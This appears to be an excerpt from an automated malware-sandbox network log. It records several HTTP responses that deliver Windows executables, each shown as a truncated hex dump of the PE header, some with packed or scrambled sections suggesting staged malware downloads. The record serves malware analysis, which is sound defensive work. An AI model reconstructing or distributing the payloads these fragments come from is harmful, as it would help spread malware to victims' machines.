00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 19:51:14 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 19:51:17 GMTContent-Type: application/octet-streamContent-Length: 357376Last-Modified: Thu, 13 Jan 2022 18:42:45 GMTConnection: keep-aliveETag: "61e072a5-57400"Expires: Thu, 20 Jan 2022 19:51:17 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5e 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 4c 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4c 16 04 00 00 90 01 00 00 18 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 19:51:22 GMTContent-Type: application/octet-streamContent-Length: 357376Last-Modified: Thu, 13 Jan 2022 19:33:07 GMTConnection: keep-aliveETag: "61e07e73-57400"Expires: Thu, 20 Jan 2022 19:51:22 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5e 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 44 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 44 16 04 00 00 90 01 00 00 18 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 19:51:23 GMTContent-Type: application/octet-streamContent-Length: 452096Last-Modified: Thu, 13 Jan 2022 18:37:45 GMTConnection: keep-aliveETag: "61e07179-6e600"Expires: Thu, 20 Jan 2022 19:51:23 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 15 67 78 67 74 09 2b 67 74 09 2b 67 74 09 2b b4 06 0a 2a 6d 74 09 2b b4 06 0c 2a eb 74 09 2b b4 06 0d 2a 73 74 09 2b 35 01 0c 2a 41 74 09 2b 35 01 0d 2a 76 74 09 2b 35 01 0a 2a 75 74 09 2b b4 06 08 2a 64 74 09 2b 67 74 08 2b 30 74 09 2b d2 01 0c 2a 66 74 09 2b d2 01 f6 2b 66 74 09 2b 67 74 9e 2b 66 74 09 2b d2 01 0b 2a 66 74 09 2b 52 69 63 68 67 74 09 2b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 3a 54 e0 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0e 1d 00 d0 00 00 00 ec 0f 00 00 00 00 00 00 10 00 00 00 10 00 00 00 e0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 15 00 00 04 00 00 19 a2 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c ec 10 00 a4 00 00 00 00 20 0f 00 1d a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 2d 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 10 00 00 00 76 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 60 00 00 00 e0 00 00 00 2a 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 e0 0d 00 00 40 01 00 00 0a 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 b0 01 00 00 20 0f 00 00 a4 01 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 10 00 00 00 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 a0 04 00 00 e0 10 00 00 94 04 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 61 64 61 74 61 00 00 00 10 00 00 00 80 15 00 00 00 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 19:51:24 GMTContent-Type: application/octet-streamContent-Length: 2416280Last-Modified: Thu, 13 Jan 2022 18:38:17 GMTConnection: keep-aliveETag: "61e07199-24de98"Expires: Thu, 20 Jan 2022 19:51:24 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ca 5e 3d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 64 3f 00 00 6e 04 00 00 00 00 00 00 30 44 00 00 20 00 00 00 a0 3f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 45 00 00 04 00 00 86 bb 25 00 02 00 60 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 3f 00 d4 01 00 00 00 c0 3f 00 a0 6c 04 00 00 00 00 00 00 00 00 00 d0 c5 24 00 c8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 65 64 61 74 61 00 00 00 a0 3f 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 62 73 73 00 00 00 00 00 10 00 00 00 b0 3f 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a0 6c 04 00 00 c0 3f 00 09 6b 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 63 74 6f 72 73 00 00 00 80 01 00 00 30 44 00 0b 7d 01 00 00 72 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 19:51:25 GMTContent-Type: application/octet-streamContent-Length: 226816Last-Modified: Thu, 13 Jan 2022 19:31:57 GMTConnection: keep-aliveETag: "61e07e2d-37600"Expires: Thu, 20 Jan 2022 19:51:25 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a7 79 e0 61 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 70 03 00 00 04 00 00 00 00 00 00 12 8e 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 fc a7 03 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 8d 03 00 4f 00 00 00 00 a0 03 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 0c 00 00 00 88 8c 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 6e 03 00 00 20 00 00 00 70 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 00 00 00 00 a0 03 00 00 02 00 00 00 72 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 03 00 00 02 00 00 00 74 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 8d 03 00 00 00 00 00 48 00 00 00 02 00 05 00 00 98 00 00 d0 68 00 00 03 00 02 00 01 00 00 06 d0 00 01 00 b8 8b 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 00 28 15 00 00 0a 00 16 28 16 00 00 0a 00 73 0a 00 00 06 28 17 00 00 0a 00 2a 26 02 28 18 00 00 0a 00 00 2a 00 00 00 13 30 02 00 39 00 00 00 01 00 00 11 00 7e 01 00 00 04 14 fe 01 0a 06 2c 22 00 72 01 00 00 70 d0 03 00 00 02 28 19 00 00 0a 6f 1a 00 00 0a 73 1b 00 00 0a 0b 07 80 01 00 00 04 00 7e 01 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 7e 02 00 00 04 0a 2b 00 06 2a 22 00 02 80 02 00 00 04 2a 13 30 03 00 21 00 00 00 03 00 00 11 00 28 03 00 00 06 72 63 00 00 70 7e 02 00 00 04 6f 1c 00 00 0a 0a 06 74 01 00 00 1b 0b 2b 00 07 2a 00 00 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 7e 03 00 00 04 0a 2b 00 06 2a 22 02 28 1d 00 00 0a 00 2a 56 73 08 00 00 06 28 1e 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 5e 02 14 7d 04 00 00 04 02 28 1f 00 00 0a 00 00 02 28 14 00 00 06 00 2a 00 00 13 30 01 00 0f 00 00 00 05 00 00 11 00 73 38 00 00 06 0a 06 6f 20 00 00 0a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 19:51:26 GMTContent-Type: application/octet-streamContent-Length: 535232Last-Modified: Thu, 13 Jan 2022 18:38:25 GMTConnection: keep-aliveETag: "61e071a1-82ac0"Expires: Thu, 20 Jan 2022 19:51:26 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 73 0f cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3a 00 00 00 0a 04 00 00 00 00 00 00 a0 04 00 00 20 00 00 00 60 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 be bf 08 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e4 01 00 00 00 90 00 00 ac 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 6c 73 00 00 00 00 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 80 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ac 08 04 00 00 90 00 00 ac 08 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 80 01 00 00 a0 04 00 11 7d 01 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
